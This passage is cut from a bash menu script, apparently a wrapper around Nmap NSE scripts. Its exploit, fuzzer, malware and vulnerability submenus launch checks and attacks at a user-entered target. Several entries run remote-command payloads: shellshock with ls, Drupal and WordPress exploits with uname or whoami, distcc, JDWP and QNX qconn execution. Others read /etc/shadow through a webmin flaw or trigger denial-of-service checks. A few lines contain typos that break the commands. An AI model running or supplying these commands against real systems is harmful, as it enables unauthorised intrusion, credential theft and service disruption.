http-awstatstotals-exec.uri=/awstats/index.php' $ip & 1526 | elif test $cin == '9' 1527 | then 1528 | echo 1529 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1530 | read ip 1531 | $urxvt -p80 --script http-axis2-dir-traversal $ip & 1532 | elif test $cin == '10' 1533 | then 1534 | echo 1535 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1536 | read ip 1537 | echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0 1538 | read port 1539 | $urxvt --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p $port $ip & 1540 | elif test $cin == '11' 1541 | then 1542 | echo 1543 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1544 | read ip 1545 | $urxvt -p 80 --script http-coldfusion-subzero --script-args basepath=/cf/ $ip & 1546 | elif test $cin == '12' 1547 | then 1548 | echo 1549 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1550 | read ip 1551 | $urxvt -p 80 --script http-csrf.nse $ip & 1552 | elif test $cin == '13' 1553 | then 1554 | echo 1555 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1556 | read ip 1557 | $urxvt -sV --script http-dlink-backdoor $ip & 1558 | elif test $cin == '14' 1559 | then 1560 | echo 1561 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1562 | read ip 1563 | $urxvt -p 80 --script http-dombased-xss.nse $ip & 1564 | elif test $cin == '15' 1565 | then 1566 | echo 1567 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1568 | read ip 1569 | $urxvt -p 80 --script http-fileupload-exploiter.nse $ip & 1570 | elif test $cin == '16' 1571 | then 1572 | echo 1573 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1574 | read ip 1575 | $urxvt -p 80 --script http-huawei-hg5xx-vuln $ip & 1576 | elif test $cin == '17' 1577 | then 1578 | echo 1579 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1580 | read ip 1581 | $urxvt -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php $ip & 1582 | elif test $cin == '18' 1583 | then 1584 | echo 1585 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1586 | read ip 1587 | $urxvt -p 80 --script http-majordomo2-dir-traversal $ip & 1588 | elif test $cin == '19' 1589 | then 1590 | echo 1591 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1592 | read ip 1593 | $urxvt -p 80 --script http-phpmyadmin-dir-traversal $ip & 1594 | elif test $cin == '20' 1595 | then 1596 | echo 1597 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1598 | read ip 1599 | $urxvt -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls $ip & 1600 | elif test $cin == '21' 1601 | then 1602 | echo 1603 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1604 | read ip 1605 | $urxvt -p 80 --script http-stored-xss.nse $ip & 1606 | elif test $cin == '22' 1607 | then 1608 | echo 1609 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1610 | read ip 1611 | $urxvt -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn $ip & 1612 | elif test $cin == '23' 1613 | then 1614 | echo 1615 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1616 | read ip 1617 | $urxvt -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow $ip & 1618 | elif test $cin == '24' 1619 | then 1620 | echo 1621 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1622 | read ip 1623 | $urxvt --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" $ip & 1624 | elif test $cin == '25' 1625 | then 1626 | echo 1627 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1628 | read ip 1629 | $urxvt -sV --script http-vuln-cve2012-1823 $ip & 1630 | elif test $cin == '26' 1631 | then 1632 | echo 1633 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1634 | read ip 1635 | $urxvt -sV --script http-vuln-cve2013-0156 $ip & 1636 | elif test $cin == '27' 1637 | then 1638 | echo 1639 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1640 | read ip 1641 | $urxvt -sV http-rompager-xss $ip & 1642 | elif test $cin == '28' 1643 | then 1644 | echo 1645 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1646 | read ip 1647 | $urxvt -p 80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra $ip & 1648 | elif test $cin == '29' 1649 | then 1650 | echo 1651 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1652 | read ip 1653 | $urxvt --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" $ip & 1654 | elif test $cin == '30' 1655 | then 1656 | echo 1657 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1658 | read ip 1659 | $urxvt --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" $ip & 1660 | elif test $cin == '31' 1661 | then 1662 | echo 1663 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1664 | read ip 1665 | $urxvt -sV --script http-vuln-wnr1000-creds $ip -p 80 & 1666 | elif test $cin == '32' 1667 | then 1668 | echo 1669 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1670 | read ip 1671 | $urxvt -sV --script=irc-unrealircd-backdoor $ip & 1672 | elif test $cin == '33' 1673 | then 1674 | echo 1675 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1676 | read ip 1677 | echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0 1678 | read port 1679 | $urxvt -sT $ip -p $port --script=+jdwp-exec --script-args cmd="date" & 1680 | elif test $cin == '34' 1681 | then 1682 | echo 1683 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1684 | read ip 1685 | echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0 1686 | read port 1687 | $urxvt -sT $ip -p $port --script=+jdwp-inject --script-args filename=HelloWorld.class & 1688 | elif test $cin == '35' 1689 | then 1690 | echo 1691 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1692 | read ip 1693 | echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0 1694 | read port 1695 | $urxvt --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p $port $ip & 1696 | elif test $cin == '36' 1697 | then 1698 | echo 1699 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1700 | read ip 1701 | $urxvt --script smb-vuln-conficker.nse -p 445 $ip & 1702 | elif test $cin == '37' 1703 | then 1704 | echo 1705 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1706 | read ip 1707 | $urxvt --script smb-vuln-cve2009-3103.nse -p 445 $ip & 1708 | elif test $cin == '38' 1709 | then 1710 | echo 1711 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1712 | read ip 1713 | $urxvt --script smb-vuln-ms06-025.nse -p 445 $ip & 1714 | elif test $cin == '39' 1715 | then 1716 | echo 1717 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1718 | read ip 1719 | $urxvt --script smb-vuln-ms07-029.nse -p 445 $ip & 1720 | elif test $cin == '40' 1721 | then 1722 | echo 1723 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1724 | read ip 1725 | $urxvt --script smb-vuln-ms08-067.nse -p 445 $ip & 1726 | elif test $cin == '41' 1727 | then 1728 | echo 1729 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1730 | read ip 1731 | $urxvt --script smb-vuln-regsvc-dos.nse -p 445 $ip & 1732 | elif test $cin == '42' 1733 | then 1734 | echo 1735 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1736 | read ip 1737 | $urxvt --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 $ip & 1738 | elif test $cin == '43' 1739 | then 1740 | echo 1741 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1742 | read ip 1743 | $urxvt -p49152 --script supermicro-ipmi-conf $ip & 1744 | elif test $cin == '44' 1745 | then 1746 | nse 1747 | else 1748 | echo "" 1749 | echo -e $okegreen " Incorrect Number" 1750 | fi 1751 | echo "" 1752 | echo "" 1753 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 1754 | read back 1755 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 1756 | then 1757 | clear 1758 | menu 1759 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 1760 | then 1761 | exploit 1762 | fi 1763 | } 1764 | 1765 | 1766 | function fuzzer () { 1767 | clear 1768 | echo 1769 | echo 1770 | echo -e $white" [$okegreen"01"$white]$cyan File dns-fuzz " 1771 | echo -e $white" [$okegreen"02"$white]$cyan File http-form-fuzzer " 1772 | echo -e $white" [$okegreen"03"$white]$cyan File http-phpself-xss " 1773 | echo -e $white" [$okegreen"04"$white]$cyan Back " 1774 | echo -e " " 1775 | echo -n -e $red' \033[4mScreetsec@nse-fuzzer:\033[0m>> '; tput sgr0 #insert your choice 1776 | read win 1777 | if test $win == '1' 1778 | then 1779 | echo 1780 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1781 | read ip 1782 | $urxvt -sU --script dns-fuzz --script-args timelimit=2h $ip & 1783 | elif test $win == '2' 1784 | then 1785 | echo 1786 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1787 | read ip 1788 | $urxvt --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip & 1789 | elif test $win == '3' 1790 | then 1791 | echo 1792 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1793 | read ip 1794 | $urxvt --script=http-phpself-xss -p80 $ip & 1795 | elif test $win == '4' 1796 | then 1797 | nse 1798 | else 1799 | echo "" 1800 | echo -e $okegreen " Incorrect Number" 1801 | fi 1802 | echo "" 1803 | echo "" 1804 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 1805 | read back 1806 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 1807 | then 1808 | clear 1809 | menu 1810 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 1811 | then 1812 | fuzzer 1813 | fi 1814 | } 1815 | 1816 | 1817 | function malware () { 1818 | clear 1819 | echo 1820 | echo 1821 | echo -e $white" [$okegreen"01"$white]$cyan auth-spoof " 1822 | echo -e $white" [$okegreen"02"$white]$cyan dns-zeustracker " 1823 | echo -e $white" [$okegreen"03"$white]$cyan ftp-proftpd-backdoor " 1824 | echo -e $white" [$okegreen"04"$white]$cyan ftp-vsftpd-backdoor " 1825 | echo -e $white" [$okegreen"05"$white]$cyan http-google-malware " 1826 | echo -e $white" [$okegreen"06"$white]$cyan http-malware-host " 1827 | echo -e $white" [$okegreen"07"$white]$cyan http-virustotal " 1828 | echo -e $white" [$okegreen"08"$white]$cyan irc-unrealircd-backdoor " 1829 | echo -e $white" [$okegreen"09"$white]$cyan smtp-strangeport " 1830 | echo -e $white" [$okegreen"10"$white]$cyan back " 1831 | echo 1832 | echo -n -e $red' \033[4mScreetsec@nse-malware:\033[0m>> '; tput sgr0 #insert your choice 1833 | read malw 1834 | if test $malw == '1' 1835 | then 1836 | echo 1837 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1838 | read ip 1839 | $urxvt -sV --script=auth-spoof $ip & 1840 | elif test $malw == '2' 1841 | then 1842 | echo 1843 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1844 | read ip 1845 | $urxvt -sn -PN --script=dns-zeustracker $ip & 1846 | elif test $malw == '3' 1847 | then 1848 | echo 1849 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1850 | read ip 1851 | $urxvt --script ftp-proftpd-backdoor -p 21 $ip & 1852 | elif test $malw == '4' 1853 | then 1854 | echo 1855 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1856 | read ip 1857 | $urxvt --script ftp-vsftpd-backdoor -p 21 $ip & 1858 | elif test $malw == '5' 1859 | then 1860 | echo 1861 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1862 | read ip 1863 | $urxvt -p80 --script http-google-malware $ip & 1864 | elif test $malw == '6' 1865 | then 1866 | echo 1867 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1868 | read ip 1869 | $urxvt -sV --script=http-malware-host $ip & 1870 | elif test $malw == '7' 1871 | then 1872 | echo 1873 | echo -ne $okegreen " an API key acquired from the virustotal web page: " ; tput sgr0 1874 | read key 1875 | echo -ne $okegreen " a SHA1, SHA256, MD5 checksum of a file to check: " ; tput sgr0 1876 | read sum 1877 | $urxvt --script http-virustotal --script-args="http-virustotal.apikey="$key",http-virustotal.checksum="$sum"" & 1878 | elif test $malw == '8' 1879 | then 1880 | echo 1881 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1882 | read ip 1883 | $urxvt-sV --script=irc-unrealircd-backdoor $ip & 1884 | elif test $malw == '9' 1885 | then 1886 | echo 1887 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1888 | read ip 1889 | $urxvt -sV --script=smtp-strangeport $ip & 1890 | elif test $malw == '10' 1891 | then 1892 | nse 1893 | else 1894 | echo "" 1895 | echo -e $okegreen " Incorrect Number" 1896 | fi 1897 | echo "" 1898 | echo "" 1899 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 1900 | read back 1901 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 1902 | then 1903 | clear 1904 | menu 1905 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 1906 | then 1907 | malware 1908 | fi 1909 | } 1910 | 1911 | 1912 | #!/bin/bash 1913 | 1914 | 1915 | function vuln () { 1916 | 1917 | 1918 | clear 1919 | echo 1920 | echo -e $white" [$okegreen"01"$white]$cyan afp-path-vuln " 1921 | echo -e $white" [$okegreen"02"$white]$cyan broadcast-avahi-dos " 1922 | echo -e $white" [$okegreen"03"$white]$cyan clamav-exec " 1923 | echo -e $white" [$okegreen"04"$white]$cyan distcc-cve2004-2687 " 1924 | echo -e $white" [$okegreen"05"$white]$cyan dns-update " 1925 | echo -e $white" [$okegreen"06"$white]$cyan firewall-bypass " 1926 | echo -e $white" [$okegreen"07"$white]$cyan ftp-libopie " 1927 | echo -e $white" [$okegreen"08"$white]$cyan ftp-proftpd-backdoor " 1928 | echo -e $white" [$okegreen"09"$white]$cyan ftp-vsftpd-backdoor " 1929 | echo -e $white" [$okegreen"10"$white]$cyan ftp-vuln-cve2010-4221 " 1930 | echo -e $white" [$okegreen"11"$white]$cyan http-adobe-coldfusion-apsa1301 " 1931 | echo -e $white" [$okegreen"12"$white]$cyan http-aspnet-debug " 1932 | echo -e $white" [$okegreen"13"$white]$cyan http-avaya-ipoffice-users " 1933 | echo -e $white" [$okegreen"14"$white]$cyan http-awstatstotals-exec " 1934 | echo -e $white" [$okegreen"15"$white]$cyan http-axis2-dir-traversal " 1935 | echo -e $white" [$okegreen"16"$white]$cyan http-cross-domain-policy " 1936 | echo -e $white" [$okegreen"17"$white]$cyan http-csrf " 1937 | echo -e $white" [$okegreen"18"$white]$cyan http-dlink-backdoor " 1938 | echo -e $white" [$okegreen"19"$white]$cyan http-dombased-xss " 1939 | echo -e $white" [$okegreen"20"$white]$cyan http-enum " 1940 | echo -e $white" [$okegreen"21"$white]$cyan http-fileupload-exploiter " 1941 | echo -e $white" [$okegreen"22"$white]$cyan http-frontpage-login " 1942 | echo -e $white" [$okegreen"23"$white]$cyan http-git " 1943 | echo -e $white" [$okegreen"24"$white]$cyan http-huawei-hg5xx-vuln " 1944 | echo -e $white" [$okegreen"25"$white]$cyan http-iis-webdav-vuln " 1945 | echo -e $white" [$okegreen"26"$white]$cyan http-internal-ip-disclosure " 1946 | echo -e $white" [$okegreen"27"$white]$cyan http-litespeed-sourcecode-download " 1947 | echo -e $white" [$okegreen"28"$white]$cyan http-majordomo2-dir-traversal " 1948 | echo -e $white" [$okegreen"29"$white]$cyan http-method-tamper " 1949 | echo -e $white" [$okegreen"30"$white]$cyan http-passwd " 1950 | echo -e $white" [$okegreen"31"$white]$cyan http-phpmyadmin-dir-traversal " 1951 | echo -e $white" [$okegreen"32"$white]$cyan http-phpself-xss " 1952 | echo -e $white" [$okegreen"33"$white]$cyan http-shellshock " 1953 | echo -e $white" [$okegreen"34"$white]$cyan http-slowloris-check " 1954 | echo -e $white" [$okegreen"35"$white]$cyan http-sql-injection " 1955 | echo -e $white" [$okegreen"36"$white]$cyan http-stored-xss " 1956 | echo -e $white" [$okegreen"37"$white]$cyan http-tplink-dir-traversal " 1957 | echo -e $white" [$okegreen"38"$white]$cyan http-trace " 1958 | echo -e $white" [$okegreen"39"$white]$cyan http-vmware-path-vuln " 1959 | echo -e $white" [$okegreen"40"$white]$cyan http-vuln-cve2006-3392 " 1960 | echo -e $white" [$okegreen"41"$white]$cyan http-vuln-cve2010-0738 " 1961 | echo -e $white" [$okegreen"42"$white]$cyan http-vuln-cve2010-2861 " 1962 | echo -e $white" [$okegreen"43"$white]$cyan http-vuln-cve2011-3192 " 1963 | echo -e $white" [$okegreen"44"$white]$cyan http-vuln-cve2011-3368 " 1964 | echo -e $white" [$okegreen"45"$white]$cyan http-vuln-cve2012-1823 " 1965 | echo -e $white" [$okegreen"46"$white]$cyan http-vuln-cve2013-0156 " 1966 | echo -e $white" [$okegreen"47"$white]$cyan http-vuln-cve2013-6786 " 1967 | echo -e $white" [$okegreen"48"$white]$cyan http-vuln-cve2013-7091 " 1968 | echo -e $white" [$okegreen"49"$white]$cyan http-vuln-cve2014-2126 " 1969 | echo -e $white" [$okegreen"50"$white]$cyan http-vuln-cve2014-2127 " 1970 | echo -e $white" [$okegreen"51"$white]$cyan http-vuln-cve2014-2128 " 1971 | echo -e $white" [$okegreen"52"$white]$cyan http-vuln-cve2014-2129 " 1972 | echo -e $white" [$okegreen"53"$white]$cyan http-vuln-cve2014-3704 " 1973 | echo -e $white" [$okegreen"54"$white]$cyan http-vuln-cve2014-8877 " 1974 | echo -e $white" [$okegreen"55"$white]$cyan http-vuln-cve2015-1427 " 1975 | echo -e $white" [$okegreen"56"$white]$cyan http-vuln-cve2015-1635 " 1976 | echo -e $white" [$okegreen"57"$white]$cyan http-vuln-misfortune-cookie " 1977 | echo -e $white" [$okegreen"58"$white]$cyan http-vuln-wnr1000-creds " 1978 | echo -e $white" [$okegreen"59"$white]$cyan http-wordpress-users " 1979 | echo -e $white" [$okegreen"60"$white]$cyan ipmi-cipher-zero " 1980 | echo -e $white" [$okegreen"61"$white]$cyan irc-botnet-channels " 1981 | echo -e $white" [$okegreen"62"$white]$cyan irc-unrealircd-backdoor " 1982 | echo -e $white" [$okegreen"63"$white]$cyan mysql-vuln-cve2012-2122 " 1983 | echo -e $white" [$okegreen"64"$white]$cyan netbus-auth-bypass " 1984 | echo -e $white" [$okegreen"65"$white]$cyan qconn-exec " 1985 | echo -e $white" [$okegreen"66"$white]$cyan rdp-vuln-ms12-020 " 1986 | echo -e $white" [$okegreen"67"$white]$cyan rmi-vuln-classloader " 1987 | echo -e $white" [$okegreen"68"$white]$cyan samba-vuln-cve-2012-1182 " 1988 | echo -e $white" [$okegreen"69"$white]$cyan smb-vuln-conficker " 1989 | echo -e $white" [$okegreen"70"$white]$cyan smb-vuln-cve2009-3103 " 1990 | echo -e $white" [$okegreen"71"$white]$cyan smb-vuln-ms06-025 " 1991 | echo -e $white" [$okegreen"72"$white]$cyan smb-vuln-ms07-029 " 1992 | echo -e $white" [$okegreen"73"$white]$cyan smb-vuln-ms08-067 " 1993 | echo -e $white" [$okegreen"74"$white]$cyan smb-vuln-ms10-054 " 1994 | echo -e $white" [$okegreen"75"$white]$cyan smb-vuln-ms10-061 " 1995 | echo -e $white" [$okegreen"76"$white]$cyan smb-vuln-regsvc-dos " 1996 | echo -e $white" [$okegreen"77"$white]$cyan smtp-vuln-cve2010-4344 " 1997 | echo -e $white" [$okegreen"78"$white]$cyan smtp-vuln-cve2011-1720 " 1998 | echo -e $white" [$okegreen"79"$white]$cyan smtp-vuln-cve2011-1764 " 1999 | echo -e $white" [$okegreen"80"$white]$cyan ssl-ccs-injection " 2000 | echo -e $white" [$okegreen"81"$white]$cyan ssl-cert-intaddr " 2001 | echo -e $white" [$okegreen"82"$white]$cyan ssl-dh-params " 2002 | echo -e $white" [$okegreen"83"$white]$cyan ssl-heartbleed " 2003 | echo -e $white" [$okegreen"84"$white]$cyan ssl-known-key " 2004 | echo -e $white" [$okegreen"85"$white]$cyan ssl-poodle " 2005 | echo -e $white" [$okegreen"86"$white]$cyan sslv2-drown " 2006 | echo -e $white" [$okegreen"87"$white]$cyan supermicro-ipmi-conf " 2007 | echo -e $white" [$okegreen"88"$white]$cyan wdb-version " 2008 | echo -e $white" [$okegreen"89"$white]$cyan back " 2009 | echo -e " " 2010 | echo -n -e $red' \033[4mScreetsec@nse-vuln:\033[0m>> '; tput sgr0 #insert your choice 2011 | read vuln 2012 | if test $vuln == '1' 2013 | then 2014 | echo 2015 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2016 | read ip 2017 | $urxvt -sV --script=afp-path-vuln $ip & 2018 | elif test $vuln == '2' 2019 | then 2020 | echo 2021 | $urxvt --script=broadcast-avahi-dos & 2022 | elif test $vuln == '3' 2023 | then 2024 | echo 2025 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2026 | read ip 2027 | $urxvt -sV --script clamav-exec $ip & 2028 | elif test $vuln == '4' 2029 | then 2030 | echo 2031 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2032 | read ip 2033 | $urxvt -p 3632 $ip --script distcc-exec --script-args="distcc-exec.cmd='id'" & 2034 | elif test $vuln == '5' 2035 | then 2036 | echo 2037 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2038 | read ip 2039 | $urxvt -sU -p 53 --script=dns-update --script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1 $ip & 2040 | elif test $vuln == '6' 2041 | then 2042 | echo 2043 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2044 | read ip 2045 | $urxvt --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 $ip & 2046 | elif test $vuln == '7' 2047 | then 2048 | echo 2049 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2050 | read ip 2051 | $urxvt -sV --script=ftp-libopie $ip & 2052 | elif test $vuln == '8' 2053 | then 2054 | echo 2055 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2056 | read ip 2057 | $urxvt --script ftp-proftpd-backdoor -p 21 $ip & 2058 | elif test $vuln == '9' 2059 | then 2060 | echo 2061 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2062 | read ip 2063 | $urxvt --script ftp-vsftpd-backdoor -p 21 $ip & 2064 | elif test $vuln == '10' 2065 | then 2066 | echo 2067 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2068 | read ip 2069 | echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0 2070 | read port 2071 | $urxvt --script ftp-vuln-cve2010-4221 -p $port $ip & 2072 | elif test $vuln == '11' 2073 | then 2074 | echo 2075 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2076 | read ip 2077 | $urxvt -p 80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ $ip & 2078 | elif test $vuln == '12' 2079 | then 2080 | echo 2081 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2082 | read ip 2083 | $urxvt --script http-debug --script-args http-aspnet-debug.path=/path $ip & 2084 | elif test $vuln == '13' 2085 | then 2086 | echo 2087 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2088 | read ip 2089 | $urxvt -sV --script http-avaya-ipoffice-users $ip & 2090 | elif test $vuln == '14' 2091 | then 2092 | echo 2093 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2094 | read ip 2095 | $urxvt -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' $ip & 2096 | elif test $vuln == '15' 2097 | then 2098 | echo 2099 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2100 | read ip 2101 | $urxvt -p 80 --script http-axis2-dir-traversal $ip & 2102 | elif test $vuln == '16' 2103 | then 2104 | echo 2105 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2106 | read ip 2107 | $urxvt -p 80 --script http-crossdomainxml --script-args http.domain-lookup=true $ip & 2108 | elif test $vuln == '17' 2109 | then 2110 | echo 2111 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2112 | read ip 2113 | $urxvt -p 80 --script http-csrf.nse $ip & 2114 | elif test $vuln == '18' 2115 | then 2116 | echo 2117 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2118 | read ip 2119 | $urxvt -sV --script http-dlink-backdoor $ip & 2120 | elif test $vuln == '19' 2121 | then 2122 | echo 2123 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2124 | read ip 2125 | $urxvt -p 80 --script http-dombased-xss.nse $ip & 2126 | elif test $vuln == '20' 2127 | then 2128 | echo 2129 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2130 | read ip 2131 | $urxvt -sV --script=http-enum $ip & 2132 | elif test $vuln == '21' 2133 | then 2134 | echo 2135 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2136 | read ip 2137 | $urxvt -p 80 --script http-fileupload-exploiter.nse $ip & 2138 | elif test $vuln == '22' 2139 | then 2140 | echo 2141 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2142 | read ip 2143 | $urxvt $ip -p 80 --script=http-frontpage-login & 2144 | elif test $vuln == '23' 2145 | then 2146 | echo 2147 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2148 | read ip 2149 | $urxvt sV -sC $ip & 2150 | elif test $vuln == '24' 2151 | then 2152 | echo 2153 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2154 | read ip 2155 | $urxvt -sV http-huawei-hg5xx-vuln $ip & 2156 | elif test $vuln == '25' 2157 | then 2158 | echo 2159 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2160 | read ip 2161 | $urxvt --script http-iis-webdav-vuln -p 80,8080 $ip & 2162 | elif test $vuln == '26' 2163 | then 2164 | echo 2165 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2166 | read ip 2167 | $urxvt --script http-internal-ip-disclosure --script-args http-internal-ip-disclosure.path=/path $ip & 2168 | elif test $vuln == '27' 2169 | then 2170 | echo 2171 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2172 | read ip 2173 | $urxvt -p 80,8080 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php $ip & 2174 | elif test $vuln == '28' 2175 | then 2176 | echo 2177 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2178 | read ip 2179 | $urxvt -p 80 --script http-majordomo2-dir-traversal $ip & 2180 | elif test $vuln == '29' 2181 | then 2182 | echo 2183 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2184 | read ip 2185 | $urxvt -p80 --script http-method-tamper --script-args 'http-method-tamper.paths={/protected/db.php,/protected/index.php}' $ip & 2186 | elif test $vuln == '30' 2187 | then 2188 | echo 2189 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2190 | read ip 2191 | $urxvt --script http-passwd --script-args http-passwd.root=/test/ $ip & 2192 | elif test $vuln == '31' 2193 | then 2194 | echo 2195 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2196 | read ip 2197 | $urxvt -p80 --script http-phpmyadmin-dir-traversal $ip & 2198 | elif test $vuln == '32' 2199 | then 2200 | echo 2201 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2202 | read ip 2203 | $urxvt -sV --script http-self-xss $ip & 2204 | elif test $vuln == '33' 2205 | then 2206 | echo 2207 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2208 | read ip 2209 | $urxvt -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls $ip & 2210 | elif test $vuln == '34' 2211 | then 2212 | echo 2213 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2214 | read ip 2215 | $urxvt --script http-slowloris-check $ip & 2216 | elif test $vuln == '35' 2217 | then 2218 | echo 2219 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2220 | read ip 2221 | $urxvt -sV --script=http-sql-injection $ip & 2222 | elif test $vuln == '36' 2223 | then 2224 | echo 2225 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2226 | read ip 2227 | $urxvt -p 80 --script http-stored-xss.nse $ip & 2228 | elif test $vuln == '37' 2229 | then 2230 | echo 2231 | echo -ne $okegreen " What is your IP Target or Host: " ; tput 